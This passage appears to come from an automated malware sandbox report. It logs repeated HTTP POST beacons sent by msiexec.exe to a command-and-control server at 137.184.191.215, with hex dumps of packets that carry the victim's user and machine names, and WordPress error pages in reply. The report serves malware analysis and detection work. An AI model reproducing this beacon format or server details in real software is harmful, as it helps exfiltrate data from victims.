                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:31.998651981 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.549738137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:32.149645090 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:32.156332016 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:34.719510078 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:32 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:34.719544888 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:34.719567060 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.549739137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:34.889940023 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:34.894943953 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:37.488109112 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:35 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:37.488132000 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:37.488142014 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.549740137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:37.649485111 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:37.656692982 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:40.272311926 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:38 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:40.272363901 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:40.272398949 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:40.272434950 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.549741137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:40.675827026 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:40.680871010 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:43.361421108 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:41 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:43.361442089 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:43.361454964 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.549742137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:43.540724039 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:43.545598030 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:46.086179018 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:44 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:46.086235046 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:46.086245060 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:46.086256027 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.549743137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:46.235235929 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:46.240169048 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:48.810386896 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:46 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
